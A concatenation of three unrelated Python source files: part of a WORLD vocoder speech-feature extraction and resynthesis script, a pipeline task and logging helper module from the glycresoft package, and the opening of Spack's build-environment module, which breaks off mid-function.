parser.add_argument("--mcep_dim_start", default=2,
type=int, help="first dimension index of mel cepstrum")
parser.add_argument("--mcep_dim_end", default=37,
type=int, help="last dimension index of mel cepstrum")
parser.add_argument("--mcep_alpha", default=0.455,
type=float, help="Alpha of mel cepstrum")
parser.add_argument("--highpass_cutoff", default=70,
type=int, help="cut off frequency in lowpass filter")
parser.add_argument("--f0_dim_idx", default=1,
type=int, help="f0 dimension index")
parser.add_argument("--ap_dim_idx", default=-2,
type=int, help="ap dimension index")
# flags setting
parser.add_argument("--save_f0", default=True,
type=strtobool, help="if set True, features f0 will be saved")
parser.add_argument("--save_ap", default=False,
type=strtobool, help="if set True, features ap will be saved")
parser.add_argument("--save_spc", default=False,
type=strtobool, help="if set True, features spc will be saved")
parser.add_argument("--save_npow", default=True,
type=strtobool, help="if set True, features npow will be saved")
parser.add_argument("--save_extended", default=False,
type=strtobool, help="if set True, exteneded feature will be saved")
parser.add_argument("--save_vad", default=True,
type=strtobool, help="if set True, features vad_idx will be saved")
parser.add_argument("--overwrite", default=False,
type=strtobool, help="if set True, overwrite the exist feature files")
# other setting
parser.add_argument('--inv', default=True,
type=strtobool, help="if False, wav is restored from acoustic features")
parser.add_argument("--n_jobs", default=10,
type=int, help="number of parallel jobs")
parser.add_argument("--verbose", default=1,
type=int, help="log message level")
return parser.parse_args()
def rootdir_replace(filepath, extname=None, newdir=None):
filename = os.path.basename(filepath)
rootdir = os.path.dirname(filepath)
if extname != None:
filename = '%s.%s' % (filename.split('.')[0], extname)
if newdir == None:
newdir = rootdir
return '%s/%s'%(newdir, filename)
def extfrm(data, npow, power_threshold=-20):
T = data.shape[0]
if T != len(npow):
raise("Length of two vectors is different.")
valid_index = np.where(npow > power_threshold)
extdata = data[valid_index]
assert extdata.shape[0] <= T
return extdata, valid_index[0]
def low_cut_filter(x, fs, cutoff=70):
"""FUNCTION TO APPLY LOW CUT FILTER
Args:
x (ndarray): Waveform sequence
fs (int): Sampling frequency
cutoff (float): Cutoff frequency of low cut filter
Return:
(ndarray): Low cut filtered waveform sequence
"""
nyquist = fs // 2
norm_cutoff = cutoff / nyquist
# low cut filter
fil = firwin(255, norm_cutoff, pass_zero=False)
lcf_x = lfilter(fil, 1, x)
return lcf_x
def low_pass_filter(x, fs, cutoff=70, padding=True):
"""APPLY LOW PASS FILTER
Args:
x (ndarray): Waveform sequence
fs (int): Sampling frequency
cutoff (float): Cutoff frequency of low pass filter
Return:
(ndarray): Low pass filtered waveform sequence
"""
nyquist = fs // 2
norm_cutoff = cutoff / nyquist
# low cut filter
numtaps = 255
fil = firwin(numtaps, norm_cutoff)
x_pad = np.pad(x, (numtaps, numtaps), 'edge')
lpf_x = lfilter(fil, 1, x_pad)
lpf_x = lpf_x[numtaps + numtaps // 2: -numtaps // 2]
return lpf_x
def extend_time(feats, upsampling_factor):
"""EXTEND TIME RESOLUTION
Args:
feats (ndarray): feature vector with the shape (T x D)
upsampling_factor (int): upsampling_factor
Return:
(ndarray): extend feats with the shape (upsampling_factor*T x D)
"""
# get number
n_frames = feats.shape[0]
n_dims = feats.shape[1]
# extend time
feats_extended = np.zeros((n_frames * upsampling_factor, n_dims))
for j in range(n_frames):
start_idx = j * upsampling_factor
end_idx = (j + 1) * upsampling_factor
feats_extended[start_idx: end_idx] = repmat(feats[j, :], upsampling_factor, 1)
return feats_extended
def convert_continuos_f0(f0):
"""CONVERT F0 TO CONTINUOUS F0
Args:
f0 (ndarray): original f0 sequence with the shape (T)
Return:
(ndarray): continuous f0 with the shape (T)
"""
# get uv information as binary
uv = np.float32(f0 != 0)
# get start and end of f0
if (f0 == 0).all():
logging.warn("all of the f0 values are 0.")
return uv, f0
start_f0 = f0[f0 != 0][0]
end_f0 = f0[f0 != 0][-1]
# padding start and end of f0 sequence
cont_f0 = copy.deepcopy(f0)
start_idx = np.where(cont_f0 == start_f0)[0][0]
end_idx = np.where(cont_f0 == end_f0)[0][-1]
cont_f0[:start_idx] = start_f0
cont_f0[end_idx:] = end_f0
# get non-zero frame index
nz_frames = np.where(cont_f0 != 0)[0]
# perform linear interpolation
f = interp1d(nz_frames, cont_f0[nz_frames])
cont_f0 = f(np.arange(0, cont_f0.shape[0]))
return uv, cont_f0
def featpath_create(wav_list, feature_format):
"""CREATE FILE FOLDER"""
for wav_name in wav_list:
feat_name = wav_name.replace("wav", feature_format)
if not os.path.exists(os.path.dirname(feat_name)):
os.makedirs(os.path.dirname(feat_name))
def wavpath_create(wav_list, feature_format):
"""CREATE FILE FOLDER"""
for wav_name in wav_list:
restored_name = wav_name.replace("wav", feature_format+"_restored")
if not os.path.exists(os.path.dirname(restored_name)):
os.makedirs(os.path.dirname(restored_name))
def world_speech_synthesis(queue, wav_list, args):
"""WORLD SPEECH SYNTHESIS
Parameters
----------
queue : multiprocessing.Queue()
the queue to store the file name of utterance
wav_list : list
list of the wav files
args :
feature extract arguments
"""
# define ynthesizer
synthesizer = Synthesizer(fs=args.fs,
fftl=args.fftl,
shiftms=args.shiftms)
# synthesis
for i, wav_name in enumerate(wav_list):
if args.feature_dir==None:
restored_name = wav_name.replace("wav", args.feature_format+"_restored")
restored_name = restored_name.replace(".%s" % args.feature_format+"_restored", ".wav")
feat_name = wav_name.replace("wav", args.feature_format)
else:
restored_name = rootdir_replace(wav_name, newdir=args.feature_dir+"restored")
feat_name = rootdir_replace(wav_name, extname=args.feature_format, newdir=args.feature_dir)
if os.path.exists(restored_name):
if args.overwrite:
logging.info("overwrite %s (%d/%d)" % (restored_name, i + 1, len(wav_list)))
else:
logging.info("skip %s (%d/%d)" % (restored_name, i + 1, len(wav_list)))
continue
else:
logging.info("now processing %s (%d/%d)" % (restored_name, i + 1, len(wav_list)))
# load acoustic features
if check_hdf5(feat_name, "/world"):
h = read_hdf5(feat_name, "/world")
else:
logging.error("%s is not existed."%(feat_name))
sys.exit(1)
if check_hdf5(feat_name, "/f0"):
f0 = read_hdf5(feat_name, "/f0")
else:
uv = h[:, 0].copy(order='C')
f0 = h[:, args.f0_dim_idx].copy(order='C') # cont_f0_lpf
fz_idx = np.where(uv==0.0)
f0[fz_idx] = 0.0
if check_hdf5(feat_name, "/ap"):
ap = read_hdf5(feat_name, "/ap")
else:
codeap = h[:, args.ap_dim_idx:].copy(order='C')
ap = pyworld.decode_aperiodicity(codeap, args.fs, args.fftl)
mcep = h[:, args.mcep_dim_start:args.mcep_dim_end].copy(order='C')
# waveform synthesis
wav = synthesizer.synthesis(f0,
mcep,
ap,
alpha=args.mcep_alpha)
wav = np.clip(wav, -32768, 32767)
wavfile.write(restored_name, args.fs, wav.astype(np.int16))
#logging.info("wrote %s." % (restored_name))
queue.put('Finish')
def world_feature_extract(queue, wav_list, args):
"""EXTRACT WORLD FEATURE VECTOR
Parameters
----------
queue : multiprocessing.Queue()
the queue to store the file name of utterance
wav_list : list
list of the wav files
args :
feature extract arguments
"""
# define feature extractor
feature_extractor = FeatureExtractor(
analyzer="world",
fs=args.fs,
shiftms=args.shiftms,
minf0=args.minf0,
maxf0=args.maxf0,
fftl=args.fftl)
# extraction
for i, wav_name in enumerate(wav_list):
# check exists
if args.feature_dir==None:
feat_name = wav_name.replace("wav", args.feature_format)
else:
feat_name = rootdir_replace(wav_name, extname=args.feature_format, newdir=args.feature_dir)
#if not os.path.exists(os.path.dirname(feat_name)):
# os.makedirs(os.path.dirname(feat_name))
if check_hdf5(feat_name, "/world"):
if args.overwrite:
logging.info("overwrite %s (%d/%d)" % (wav_name, i + 1, len(wav_list)))
else:
logging.info("skip %s (%d/%d)" % (wav_name, i + 1, len(wav_list)))
continue
else:
logging.info("now processing %s (%d/%d)" % (wav_name, i + 1, len(wav_list)))
# load wavfile and apply low cut filter
fs, x = wavfile.read(wav_name)
x = np.array(x, dtype=np.float32)
if args.highpass_cutoff != 0:
x = low_cut_filter(x, fs, cutoff=args.highpass_cutoff)
# check sampling frequency
if not fs == args.fs:
logging.error("sampling frequency is not matched.")
sys.exit(1)
# extract features
f0, spc, ap = feature_extractor.analyze(x)
codeap = feature_extractor.codeap()
mcep = feature_extractor.mcep(dim=args.mcep_dim, alpha=args.mcep_alpha)
npow = feature_extractor.npow()
uv, cont_f0 = convert_continuos_f0(f0)
lpf_fs = int(1.0 / (args.shiftms * 0.001))
cont_f0_lpf = low_pass_filter(cont_f0, lpf_fs, cutoff=20)
next_cutoff = 70
while not (cont_f0_lpf>[0]).all():
logging.info("%s low-pass-filtered [%dHz]" % (feat_name, next_cutoff))
cont_f0_lpf = low_pass_filter(cont_f0, lpf_fs, cutoff=next_cutoff)
next_cutoff *= 2
# concatenate
cont_f0_lpf = np.expand_dims(cont_f0_lpf, axis=-1)
uv = np.expand_dims(uv, axis=-1)
feats = np.concatenate([uv, cont_f0_lpf, mcep, codeap], axis=1)
# save feature
write_hdf5(feat_name, "/world", feats)
if args.save_f0:
write_hdf5(feat_name, "/f0", f0)
if args.save_ap:
write_hdf5(feat_name, "/ap", ap)
if args.save_spc:
write_hdf5(feat_name, "/spc", spc)
if args.save_npow:
write_hdf5(feat_name, "/npow", npow)
if args.save_extended:
# extend time resolution
upsampling_factor = int(args.shiftms * fs * 0.001)
feats_extended = extend_time(feats, upsampling_factor)
feats_extended = feats_extended.astype(np.float32)
write_hdf5(feat_name, "/world_extend", feats_extended)
if args.save_vad:
_, vad_idx = extfrm(mcep, npow, power_threshold=args.pow_th)
write_hdf5(feat_name, "/vad_idx", vad_idx)
queue.put('Finish')
def main():
# parser arguments
args = _get_arguments()
# set log level
if args.verbose == 1:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
else:
logging.basicConfig(level=logging.WARN,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
logging.warn("logging is disabled.")
# show argmument
for key, value in vars(args).items():
logging.info("%s = %s" % (key, str(value)))
# read list
if os.path.isdir(args.waveforms):
file_list = sorted(find_files(args.waveforms, "*.wav"))
else:
file_list = read_txt(args.waveforms)
logging.info("number of utterances = %d" % len(file_list))
# set mode
if args.feature_type == "world":
if args.inv:
target_fn = world_feature_extract
filepath_create = featpath_create
else:
target_fn = world_speech_synthesis
filepath_create = wavpath_create
else:
raise NotImplementedError("Currently, only support world.")
# create file folders
if args.feature_dir==None:
filepath_create(file_list, args.feature_format)
else:
featdir = args.feature_dir
if not os.path.exists(featdir):
os.makedirs(featdir)
if not os.path.exists(featdir+"restored/"):
os.makedirs(featdir+"restored/")
# divide list
file_lists = np.array_split(file_list, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
processes = []
queue = mp.Queue()
for f in file_lists:
p = mp.Process(target=target_fn, args=(queue, f, args,))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
task.py | from __future__ import print_function
import logging
import pprint
import traceback
import multiprocessing
import threading
import six
from multiprocessing.managers import SyncManager
from datetime import datetime
try:
from Queue import Empty
except ImportError:
from queue import Empty
from glycan_profiling.version import version
logger = logging.getLogger("glycan_profiling.task")
def display_version(print_fn):
msg = "glycresoft: version %s" % version
print_fn(msg)
def ensure_text(obj):
if six.PY2:
return unicode(obj)
else:
return str(obj)
def fmt_msg(*message):
return u"%s %s" % (ensure_text(datetime.now().isoformat(' ')), u', '.join(map(ensure_text, message)))
def printer(obj, *message):
print(fmt_msg(*message))
def debug_printer(obj, *message):
if obj.in_debug_mode():
print(u"DEBUG:" + fmt_msg(*message))
class CallInterval(object):
"""Call a function every `interval` seconds from
a separate thread.
Attributes
----------
stopped: threading.Event
A semaphore lock that controls when to run `call_target`
call_target: callable
The thing to call every `interval` seconds
args: iterable
Arguments for `call_target`
interval: number
Time between calls to `call_target`
"""
def __init__(self, interval, call_target, *args):
self.stopped = threading.Event()
self.interval = interval
self.call_target = call_target
self.args = args
self.thread = threading.Thread(target=self.mainloop)
self.thread.daemon = True
def mainloop(self):
while not self.stopped.wait(self.interval):
try:
self.call_target(*self.args)
except Exception as e:
logger.exception("An error occurred in %r", self, exc_info=e)
def start(self):
self.thread.start()
def stop(self):
self.stopped.set()
class MessageSpooler(object):
"""An IPC-based logging helper
Attributes
----------
halting : bool
Whether the object is attempting to
stop, so that the internal thread can
tell when it should stop and tell other
objects using it it is trying to stop
handler : Callable
A Callable object which can be used to do
the actual logging
message_queue : multiprocessing.Queue
The Inter-Process Communication queue
thread : threading.Thread
The internal listener thread that will consume
message_queue work items
"""
def __init__(self, handler):
self.handler = handler
self.message_queue = multiprocessing.Queue()
self.halting = False
self.thread = threading.Thread(target=self.run)
self.thread.start()
def run(self):
while not self.halting:
try:
message = self.message_queue.get(True, 2)
self.handler(*message)
except Exception:
continue
def stop(self):
self.halting = True
self.thread.join()
def sender(self):
return MessageSender(self.message_queue)
class MessageSender(object):
"""A simple callable for pushing objects into an IPC
queue.
Attributes
----------
queue : multiprocessing.Queue
The Inter-Process Communication queue
"""
def __init__(self, queue):
self.queue = queue
def __call__(self, *message):
self.send(*message)
def send(self, *message):
self.queue.put(message)
def humanize_class_name(name):
parts = []
i = 0
last = 0
while i < len(name):
c = name[i]
if c.isupper() and i != last:
if i + 1 < len(name):
if name[i + 1].islower():
part = name[last:i]
parts.append(part)
last = i
i += 1
parts.append(name[last:i])
return ' '.join(parts)
class LoggingMixin(object):
logger_state = None
print_fn = printer
debug_print_fn = debug_printer
error_print_fn = printer
@classmethod
def log_with_logger(cls, logger):
LoggingMixin.logger_state = logger
LoggingMixin.print_fn = logger.info
LoggingMixin.debug_print_fn = logger.debug
LoggingMixin.error_print_fn = logger.error
@classmethod
def log_to_stdout(cls):
cls.logger_state = None
cls.print_fn = printer
cls.debug_print_fn = debug_printer
cls.error_print_fn = printer
def log(self, *message):
self.print_fn(u', '.join(map(ensure_text, message)))
def debug(self, *message):
self.debug_print_fn(u', '.join(map(ensure_text, message)))
def error(self, *message, **kwargs):
exception = kwargs.get("exception")
self.error_print_fn(u', '.join(map(ensure_text, message)))
if exception is not None:
self.error_print_fn(traceback.format_exc())
def ipc_logger(self, handler=None):
if handler is None:
def _default_closure_handler(message):
self.log(message)
handler = _default_closure_handler
return MessageSpooler(handler)
class TaskBase(LoggingMixin):
"""A base class for a discrete, named step in a pipeline that
executes in sequence.
Attributes
----------
debug_print_fn : Callable
The function called to print debug messages
display_fields : bool
Whether to display fields at the start of execution
end_time : datetime.datetime
The time when the task ended
error_print_fn : Callable
The function called to print error messages
logger_state : logging.Logger
The Logger bound to this task
print_fn : Callable
The function called to print status messages
start_time : datetime.datetime
The time when the task began
status : str
The state of the executing task
"""
status = "new"
_debug_enabled = None
display_fields = True
_display_name = None
@property
def display_name(self):
if self._display_name is None:
return humanize_class_name(self.__class__.__name__)
else:
return self._display_name
def in_debug_mode(self):
if self._debug_enabled is None:
logger_state = self.logger_state
if logger_state is not None:
self._debug_enabled = logger_state.isEnabledFor("DEBUG")
return bool(self._debug_enabled)
def _format_fields(self):
if self.display_fields:
return '\n' + pprint.pformat(
{k: v for k, v in self.__dict__.items()
if not (k.startswith("_") or v is None)})
else:
return ''
def display_header(self):
display_version(self.log)
def try_set_process_name(self, name=None):
"""This helper method may be used to try to change a process's name
in order to make discriminating which role a particular process is
fulfilling. This uses a third-party utility library that may not behave
the same way on all platforms, and therefore this is done for convenience
only.
Parameters
----------
name : str, optional
A name to set. If not provided, will check the attribute ``process_name``
for a non-null value, or else have no effect.
"""
if name is None:
name = getattr(self, 'process_name', None)
if name is None:
return
_name_process(name)
def _begin(self, verbose=True, *args, **kwargs):
self.on_begin()
self.start_time = datetime.now()
self.status = "started"
if verbose:
self.log(
"Begin %s%s" % (
self.display_name,
self._format_fields()))
def _end(self, verbose=True, *args, **kwargs):
self.on_end()
self.end_time = datetime.now()
if verbose:
self.log("End %s" % self.display_name)
self.log(self.summarize())
def on_begin(self):
pass
def on_end(self):
pass
def summarize(self):
chunks = [
"Started at %s." % self.start_time,
"Ended at %s." % self.end_time,
"Total time elapsed: %s" % (self.end_time - self.start_time),
"%s completed successfully." % self.__class__.__name__ if self.status == 'completed' else
"%s failed with error message %r" % (self.__class__.__name__, self.status),
''
]
return '\n'.join(chunks)
def start(self, *args, **kwargs):
self._begin(*args, **kwargs)
try:
out = self.run()
except (KeyboardInterrupt) as e:
logger.exception("An error occurred: %r", e, exc_info=e)
self.status = e
out = e
raise e
else:
self.status = 'completed'
self._end(*args, **kwargs)
return out
def interact(self, **kwargs):
from IPython.terminal.embed import InteractiveShellEmbed, load_default_config
import sys
config = kwargs.get('config')
header = kwargs.pop('header', u'')
compile_flags = kwargs.pop('compile_flags', None)
if config is None:
config = load_default_config()
config.InteractiveShellEmbed = config.TerminalInteractiveShell
kwargs['config'] = config
frame = sys._getframe(1)
shell = InteractiveShellEmbed.instance(
_init_location_id='%s:%s' % (
frame.f_code.co_filename, frame.f_lineno), **kwargs)
shell(header=header, stack_depth=2, compile_flags=compile_flags,
_call_location_id='%s:%s' % (frame.f_code.co_filename, frame.f_lineno))
InteractiveShellEmbed.clear_instance()
log_handle = TaskBase()
class MultiEvent(object):
def __init__(self, events):
self.events = list(events)
def set(self):
for event in self.events:
event.set()
def is_set(self):
for event in self.events:
result = event.is_set()
if not result:
return result
return True
def wait(self, *args, **kwargs):
result = True
for event in self.events:
result &= event.wait(*args, **kwargs)
return result
def clear(self):
for event in self.events:
event.clear()
class MultiLock(object):
def __init__(self, locks):
self.locks = list(locks)
def acquire(self):
for lock in self.locks:
lock.acquire()
def release(self):
for lock in self.locks:
lock.release()
def __enter__(self):
return self.acquire()
def __exit__(self, *args):
self.release()
class TaskExecutionSequence(TaskBase):
"""A task unit that executes in a separate thread or process.
"""
def __call__(self):
result = None
try:
if self._running_in_process:
self.log("%s running on PID %r" % (self, multiprocessing.current_process().pid))
result = self.run()
self.debug("%r Done" % self)
except Exception as err:
self.error("An error occurred while executing %s" %
self, exception=err)
result = None
self.set_error_occurred()
try:
self.done_event.set()
except AttributeError:
pass
finally:
return result
def run(self):
raise NotImplementedError()
def _get_repr_details(self):
return ''
_thread = None
_running_in_process = False
_error_flag = None
def error_occurred(self):
if self._error_flag is None:
return False
else:
return self._error_flag.is_set()
def set_error_occurred(self):
if self._error_flag is None:
return False
else:
return self._error_flag.set()
def __repr__(self):
template = "{self.__class__.__name__}({details})"
return template.format(self=self, details=self._get_repr_details())
def _make_event(self, provider=None):
if provider is None:
provider = threading
return provider.Event()
def _name_for_execution_sequence(self):
return ("%s-%r" % (self.__class__.__name__, id(self)))
def start(self, process=False, daemon=False):
if self._thread is not None:
return self._thread
if process:
self._running_in_process = True
self._error_flag = self._make_event(multiprocessing)
t = multiprocessing.Process(
target=self, name=self._name_for_execution_sequence())
if daemon:
t.daemon = daemon
else:
self._error_flag = self._make_event(threading)
t = threading.Thread(
target=self, name=self._name_for_execution_sequence())
if daemon:
t.daemon = daemon
t.start()
self._thread = t
return t
def join(self, timeout=None):
if self.error_occurred():
return True
return self._thread.join(timeout)
def is_alive(self):
if self.error_occurred():
return False
return self._thread.is_alive()
def stop(self):
if self.is_alive():
self.set_error_occurred()
class Pipeline(TaskExecutionSequence):
def __init__(self, tasks):
self.tasks = tasks
def start(self, *args, **kwargs):
for task in self:
task.start(*args, **kwargs)
def join(self, timeout=None):
if timeout is not None:
for task in self:
task.join(timeout)
else:
timeout = max(60 // len(self), 2)
while True:
has_error = self.error_occurred()
if has_error:
for task in self:
task.stop()
alive = 0
for task in self:
task.join(timeout)
is_alive = task.is_alive()
alive += is_alive
if alive == 0:
break
def is_alive(self):
alive = 0
for task in self:
alive += task.is_alive()
return alive
def error_occurred(self):
errors = 0
for task in self.tasks:
errors += task.error_occurred()
return errors
def stop(self):
for task in self.tasks:
task.stop()
def __iter__(self):
return iter(self.tasks)
def __len__(self):
return len(self.tasks)
def __getitem__(self, i):
return self.tasks[i]
def add(self, task):
self.tasks.append(task)
return self
class SinkTask(TaskExecutionSequence):
def __init__(self, in_queue, in_done_event):
self.in_queue = in_queue
self.in_done_event = in_done_event
self.done_event = self._make_event()
def handle_item(self, task):
pass
def process(self):
has_work = True
while has_work and not self.error_occurred():
try:
item = self.in_queue.get(True, 10)
self.handle_item(item)
except Empty:
if self.in_done_event.is_set():
has_work = False
break
self.done_event.set()
def make_shared_memory_manager():
manager = SyncManager()
manager.start(_name_process, ("glycresoft-shm", ))
return manager
def _name_process(name):
try:
import setproctitle
setproctitle.setproctitle(name)
except (ImportError, AttributeError):
pass
def elapsed(seconds):
'''Convert a second count into a human readable duration
Parameters
----------
seconds : :class:`int`
The number of seconds elapsed
Returns
-------
:class:`str` :
A formatted, comma separated list of units of duration in days, hours, minutes, and seconds
'''
periods = [
('day', 60 * 60 * 24),
('hour', 60 * 60),
('minute', 60),
('second', 1)
]
tokens = []
for period_name, period_seconds in periods:
if seconds > period_seconds:
period_value, seconds = divmod(seconds, period_seconds)
has_s = 's' if period_value > 1 else ''
tokens.append("%s %s%s" % (period_value, period_name, has_s))
return ", ".join(tokens)
|
build_environment.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.schema.environment
import spack.store
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
env.unset('DYLD_FALLBACK_LIBRARY_PATH')
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
spec = pkg.spec
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
env.set('SPACK_LINKER_ARG', compiler.linker_arg)
# Check whether we want to force RPATH or RUNPATH
if spack.config.get('config:shared_linking') == 'rpath':
env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
else:
env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)
# Set the target parameters that the compiler will add
isa_arg = spec.architecture.target.optimization_flags(compiler)
env.set('SPACK_TARGET_ARGS', isa_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
# This avoids discrepencies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
